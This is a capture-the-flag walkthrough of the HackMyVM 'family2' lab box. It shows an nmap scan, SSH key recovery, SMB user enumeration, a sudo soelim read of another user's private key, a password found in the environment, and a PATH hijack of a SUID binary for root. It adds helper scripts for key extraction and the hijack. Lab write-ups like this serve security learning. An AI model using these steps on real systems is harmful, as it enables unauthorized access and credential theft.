
HMV-family2

HMV-family2 walkthrough

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.61
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 16:11 CST
Nmap scan report for bogon (192.168.112.61)
Host is up (0.0028s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
| 256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_ 256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after: 2031-10-29T13:31:43
|_smtp-commands: debian.numericable.fr, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.51
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 11K 2021-10-31 16:25 nicegiftformybaby
|_
|_http-server-header: Apache/2.4.51 (Debian)
110/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after: 2031-10-29T13:31:43
|_pop3-capabilities: TOP USER CAPA UIDL RESP-CODES PIPELINING SASL(PLAIN) AUTH-RESP-CODE STLS
139/tcp open netbios-ssn Samba smbd 4
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS more SASL-IR ENABLE LITERAL+ STARTTLS AUTH=PLAINA0001 listed post-login capabilities IDLE ID OK Pre-login have IMAP4rev1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after: 2031-10-29T13:31:43
445/tcp open netbios-ssn Samba smbd 4
993/tcp open ssl/imap Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after: 2031-10-29T13:31:43
|_imap-capabilities: LOGIN-REFERRALS SASL-IR ENABLE LITERAL+ more IMAP4rev1 listed post-login capabilities IDLE AUTH=PLAINA0001 OK Pre-login have ID
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2021-10-31T13:31:43
|_Not valid after: 2031-10-29T13:31:43
|_ssl-date: TLS randomness does not represent time
MAC Address: 3E:78:10:7B:5C:A0 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Hosts: debian.numericable.fr, 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FAMILY2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2025-02-13T08:12:12
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 2.79 ms bogon (192.168.112.61)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.07 seconds

Lots of open ports. As usual, start with port 80; if there is nothing there, move on to the other services.

Information gathering

Port 80 serves a single file (nicegiftformybaby in the nmap directory listing). Its contents are an SSH private key.

The file is a hex dump of the key; xxd -r turns it back into the original private key file. If ssh later complains that the key file is unprotected, chmod 600 it first.

┌──(root㉿kakeru)-[~/tmp]
└─# xxd -r tmp > id_rsa

┌──(root㉿kakeru)-[~/tmp]
└─# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

I first wanted to brute-force SSH with hydra, but password logins are not accepted here at all: the server only offers publickey authentication, so there is nothing to brute-force.

┌──(root㉿kakeru)-[~/tmp]
└─# ssh root@192.168.112.61
The authenticity of host '192.168.112.61 (192.168.112.61)' can't be established.
ED25519 key fingerprint is SHA256:6HwEGo4iDv1jBtZC87BkDOsTnZ+MUZAnS9pq7IEaNCo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.112.61' (ED25519) to the list of known hosts.
root@192.168.112.61: Permission denied (publickey).

A directory scan turned up nothing.
Back to the other ports from the scan. SMB is open, so enumerate it with enum4linux; the -a option runs all the basic checks.
It returns three usernames: a whole family.

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\dad (Local User)
S-1-22-1-1001 Unix User\mum (Local User)
S-1-22-1-1002 Unix User\baby (Local User)

Now try the private key from the web server against each of those users.
It logs in as baby.

┌──(root㉿kakeru)-[~/tmp]
└─# ssh aaa@192.168.112.61
aaa@192.168.112.61: Permission denied (publickey).

┌──(root㉿kakeru)-[~/tmp]
└─# ssh dad@192.168.112.61 -i id_rsa
dad@192.168.112.61: Permission denied (publickey).

┌──(root㉿kakeru)-[~/tmp]
└─# ssh mum@192.168.112.61 -i id_rsa
mum@192.168.112.61: Permission denied (publickey).

┌──(root㉿kakeru)-[~/tmp]
└─# ssh baby@192.168.112.61 -i id_rsa
Linux family2 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Mon Nov 1 13:33:11 2021 from 192.168.0.28
baby@family2:~$

Privilege escalation

baby

sudo -l shows that baby may run soelim as mum:

baby@family2:~$ sudo -l
Matching Defaults entries for baby on family2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User baby may run the following commands on family2:
(mum) NOPASSWD: /usr/bin/soelim


soelim is a groff preprocessor: it reads the input file, resolves .so includes, and prints everything back out. Run as mum, that is an arbitrary read of any file mum can read, which gets us mum's private key.
Note the ".lf 1 /home/mum/.ssh/id_rsa" line soelim prepends to the output: strip it before saving the key, or ssh will reject the file. (The sudo rule does not restrict arguments, so soelim -r, which suppresses the .lf requests, also works.)

baby@family2:/home$ sudo -u mum soelim /home/mum/.ssh/id_rsa
.lf 1 /home/mum/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
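A small helper for the soelim file read, added here as an example (it is not part of the original writeup). It filters soelim's output down to the PEM block, dropping the .lf request, and saves the key with the permissions ssh requires. It assumes the sudo rule shown above; the target user, the path to read and the output file are parameters, and the sample used by demo_clean is a constructed stand-in, not a real key.

```shell
#!/bin/sh
# Added example, not from the original writeup: recover a usable key file from the
# sudo + soelim file read. soelim prefixes each file it reads with a groff request
# ".lf <line> <path>" (the ".lf 1 /home/mum/.ssh/id_rsa" line in the transcript);
# ssh refuses a key file that starts with it, so it has to be stripped.
# Assumed environment: a sudo rule that lets us run /usr/bin/soelim as the target user.

# Filter soelim output on stdin down to the PEM block, dropping any .lf requests
# (the sed range already excludes the leading one; grep covers .lf lines soelim
# may emit after resolving an include).
clean_soelim_output() {
    sed -n '/^-----BEGIN /,/^-----END /p' | grep -v '^\.lf '
}

# Read $2 as user $1 through sudo + soelim and write key file $3 with 0600 permissions.
# Returns non-zero if nothing key-like came back.
dump_key_via_soelim() {
    sudo -n -u "$1" /usr/bin/soelim "$2" | clean_soelim_output > "$3" || return 1
    chmod 600 "$3"
    head -n 1 "$3" | grep -q '^-----BEGIN OPENSSH PRIVATE KEY-----$'
}

# Offline demonstration on constructed soelim output (not a real key).
demo_clean() {
    sample='.lf 1 /home/mum/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gt
-----END OPENSSH PRIVATE KEY-----'
    printf '%s\n' "$sample" | clean_soelim_output
}

# On the box: dump_key_via_soelim mum /home/mum/.ssh/id_rsa ./mum_id_rsa
```

sudo -n is used so that a rule that unexpectedly asks for a password fails immediately instead of hanging the pipeline.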

Logging in as mum with that key works:

┌──(root㉿kakeru)-[~/tmp]
└─# ssh mum@192.168.112.61 -i id_rsa
Linux family2 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Nov 1 13:33:56 2021 from 192.168.0.43
mum@family2:~$

mum

mum has two sudo entries:

mum@family2:~$ sudo -l
Matching Defaults entries for mum on family2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mum may run the following commands on family2:
(root) NOPASSWD: /usr/bin/shred -f -z /etc/passwd
(dad) ALL

The root entry runs shred -f -z on /etc/passwd: it force-overwrites the file and finishes with a pass of zeros so the data cannot be recovered. That only destroys /etc/passwd; there is nothing to gain from it.
The (dad) ALL entry lets mum run anything as dad, but it has no NOPASSWD tag, so sudo asks for mum's password, which we do not have.
Next, fetch linpeas.sh from the attacking machine and run it:

mum@family2:~$ wget 192.168.112.83/linpeas.sh
--2025-02-13 09:59:23-- http://192.168.112.83/linpeas.sh
Connecting to 192.168.112.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 332111 (324K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh 100%[=============================================>] 324.33K --.-KB/s in 0.01s

2025-02-13 09:59:24 (26.0 MB/s) - ‘linpeas.sh’ saved [332111/332111]

mum@family2:~$ chmod +x linpeas.sh

It finds a password in the environment: passwd=LA0172. A plain env | grep -i pass would have shown the same thing without linpeas, and it is worth checking the environment and the shell rc files this early on every new account. The same dump also shows HISTFILE=/dev/null and HISTSIZE=0, so nothing typed in this account is written to shell history.


[+] Environment
[i] Any private information inside environment variables?
HISTFILESIZE=0
USER=mum
SSH_CLIENT=192.168.112.83 49728 22
XDG_SESSION_TYPE=tty
SHLVL=1
MOTD_SHOWN=pam
HOME=/home/mum
SSH_TTY=/dev/pts/1
LOGNAME=mum
_=./linpeas.sh
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=50
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/sbin:/usr/sbin:/sbin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
passwd=LA0172
LC_ALL=en_US.UTF-8
SSH_CONNECTION=192.168.112.83 49728 192.168.112.61 22
HISTFILE=/dev/null

Using that password at mum's sudo prompt, the (dad) ALL entry now gives a shell as dad:

mum@family2:~$ sudo -u dad /bin/bash
[sudo] password for mum:
dad@family2:/home/mum$

dad

dad's sudo entries need a password, but the list of SUID-root binaries contains one that is not a stock system binary: /opt/clock.

dad@family2:~$ find / -u root -perm -4000 -print 2>/dev/null
dad@family2:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/su
/opt/clock

dad@family2:~$ file /opt/clock
/opt/clock: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c2d23ea9475938a9dd429b6390c97b750d6a1d84, for GNU/Linux 3.2.0, not stripped

python3 is available on the box, so serve /opt over HTTP and download the binary to the attacking machine for a closer look.

dad@family2:~$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
KeyboardInterrupt
>>> cd /opt
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'cd' is not defined
>>>
KeyboardInterrupt
>>> exit()
dad@family2:~$ cd /opt
dad@family2:/opt$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Look at it with strings:

┌──(root㉿kakeru)-[~/tmp]
└─# wget 192.168.112.61:8000/clock
--2025-02-13 17:07:13-- http://192.168.112.61:8000/clock
Connecting to 192.168.112.61:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16096 (16K) [application/octet-stream]
Saving to: ‘clock’

clock 100%[=============================================>] 15.72K --.-KB/s in 0s

2025-02-13 17:07:14 (33.2 MB/s) - ‘clock’ saved [16096/16096]


┌──(root㉿kakeru)-[~/tmp]
└─# strings clock
/lib64/ld-linux-x86-64.so.2
setresuid
system
__cxa_finalize
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
date
;*3$"
GCC: (Debian 10.3.0-11) 10.3.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
suid.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
setresuid@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

The interesting strings are setresuid, system and date (and the source file name suid.c): the program switches to root with setresuid and then runs date through system().
Run it and see what it does:

dad@family2:/opt$ ./clock 
Thu 13 Feb 2025 10:09:26 AM CET

It just prints the time. Because date is invoked by bare name, system() hands it to /bin/sh, which resolves it through PATH. So all we need is to hijack date: put our own date in a directory we control (a script that runs /bin/bash) and prepend that directory to PATH. /opt itself is not writable by dad, so the home directory is used instead.

dad@family2:/opt$ echo "/bin/bash" > date
bash: date: Permission denied
dad@family2:/opt$ cd /home/dad
dad@family2:~$ echo "/bin/bash" > date
dad@family2:~$ PATH=^C
.bash_history .bashrc .local/ .python_history
.bash_logout date .profile user.txt
dad@family2:~$ PATH=/home/dad:$PATH

dad@family2:~$ /opt/clock
Thu 13 Feb 2025 10:11:39 AM CET
dad@family2:~$ chmod +x date
dad@family2:~$ /opt/clock
Thu 13 Feb 2025 10:12:01 AM CET
dad@family2:~$ export PATH=/home/dad:$PATH
dad@family2:~$ /opt/clock
root@family2:~#

With our directory first in PATH, clock's system("date") runs our script instead of the real date, and because the binary has already switched to uid 0 with setresuid, the /bin/bash it starts is a root shell. Two details in the transcript matter: the fake date has to be executable (the run before chmod +x still produced the real time), and the modified PATH has to be in the environment that clock passes down to /bin/sh (the hijack only fired after export PATH=...).
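The hijack reproduced end to end, added here as an example and not taken from the writeup. It simulates the victim with /bin/sh -c date, which is exactly what the C library's system("date") executes, so it needs no root and no SUID binary; a marker payload stands in for /bin/bash, and a temporary directory stands in for /home/dad. resolve_in_path is my own re-implementation of the shell's lookup, written so each state from the transcript can be checked.

```shell
#!/bin/sh
# Added example, not from the original writeup: the PATH hijack against /opt/clock,
# reproduced without root. The victim is simulated with `/bin/sh -c date`, which is
# what the C library's system("date") runs; the real binary additionally calls
# setresuid() first, which is what makes the spawned shell a root shell.
# Assumed: a writable directory for the fake date (the transcript used /home/dad).

# Resolve command $1 the way /bin/sh does: the first directory in the colon list $2
# holding an executable regular file of that name. Prints the path; returns 1 if none.
resolve_in_path() {
    rp_cmd=$1
    rp_saved_ifs=$IFS
    IFS=:
    for rp_dir in $2; do
        [ -n "$rp_dir" ] || rp_dir=.        # an empty PATH element means the current directory
        if [ -f "$rp_dir/$rp_cmd" ] && [ -x "$rp_dir/$rp_cmd" ]; then
            IFS=$rp_saved_ifs
            printf '%s\n' "$rp_dir/$rp_cmd"
            return 0
        fi
    done
    IFS=$rp_saved_ifs
    return 1
}

# Plant a fake "date" in directory $1. Deliberately left non-executable, mirroring the
# transcript's first attempt; the caller must chmod +x it, as the author had to.
# The payload only prints a marker here; on the box it was "/bin/bash".
plant_fake_date() {
    printf '#!/bin/sh\necho hijacked\n' > "$1/date"
}

# Run command line $2 the way system() does, with $1 as the PATH the child shell inherits.
run_like_system() {
    env PATH="$1" /bin/sh -c "$2"
}

# Walk through the states seen in the transcript and show which date wins each time.
demo_hijack() {
    d=$(mktemp -d)
    plant_fake_date "$d"
    echo "not executable yet:       $(resolve_in_path date "$d:/usr/bin:/bin" || echo none)"
    chmod +x "$d/date"
    echo "executable, PATH prepended: $(resolve_in_path date "$d:/usr/bin:/bin")"
    echo "victim output:              $(run_like_system "$d:/usr/bin:/bin" date)"
    echo "caller with a clean PATH:   $(resolve_in_path date /usr/bin:/bin || echo none)"
    rm -rf "$d"
}
```

The defensive reading is the same from either side: a privileged program must never invoke a command by bare name, and must never trust the PATH it inherited. sudo's secure_path (visible in the sudo -l output above) exists for exactly this reason; /opt/clock, hand-built with setresuid() and system(), has no such protection, and the dynamic loader's sanitising of LD_* variables for set-user-ID programs does nothing for PATH.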

Summary

A fun box that strings together a lot of small tricks. The web server hands over id_rsa directly, so overall it is a bit easier than family1.
Learned: run enum4linux -a against any box exposing SMB to pull usernames.
The privilege escalation is all about environment variables: a SUID-root binary that runs a command by relative name is taken over with a PATH hijack.